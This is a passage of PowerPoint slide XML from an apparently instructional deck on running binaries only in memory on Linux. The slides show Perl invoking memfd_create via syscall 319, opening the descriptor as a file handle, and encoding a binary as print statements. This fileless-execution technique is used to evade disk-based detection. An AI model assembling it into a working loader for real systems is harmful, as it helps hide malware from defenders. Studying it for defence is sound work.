          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Operation Steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4027901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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>Part 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000"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30</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5419799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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(name, MFD_CLOEXEC);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Perl equivalent of the above C statement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>my $name = "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>my $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(319, $name, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (-1 == $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>die</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: $!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Invoke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29017123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1" y="2675467"/>
            <a:ext cx="8712968" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Perl’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>open()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&amp;=X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a file descriptor) instead of a file name. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We’ll also want to enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>autoflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> on the new file handle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $FH, '&gt;&amp;='.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) or die "open: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>$!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select((select($FH), $|=1)[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>From an Already-open File Descriptor to a File Handle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9892849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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="239240"/>
            <a:ext cx="8229600" cy="453456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" i="1" baseline="-25000" dirty="0"/>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648" y="1052736"/>
            <a:ext cx="6624960" cy="5733602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16779804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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>Part 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000"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34</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3821382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57200" y="2675467"/>
            <a:ext cx="8507287" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Next we need to make our binary available to Perl, so we can write it to the anonymous file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Transfer a binary into Perl print statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37328493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5496" y="4437112"/>
            <a:ext cx="1584176" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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8244408" y="4221088"/>
            <a:ext cx="792088" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35496" y="4221088"/>
            <a:ext cx="2339751" cy="21602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8604448" y="2675467"/>
            <a:ext cx="432048" cy="321485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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8460432" y="2675467"/>
            <a:ext cx="144016" cy="321485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E79F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a:off x="6660232" y="2675467"/>
            <a:ext cx="144016" cy="321485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E79F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6804248" y="2652866"/>
            <a:ext cx="1656184" cy="34408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72009" y="2996952"/>
            <a:ext cx="3491879" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3059832" y="2675467"/>
            <a:ext cx="3600400" cy="32148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內容版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72009" y="2675467"/>
            <a:ext cx="9036495" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
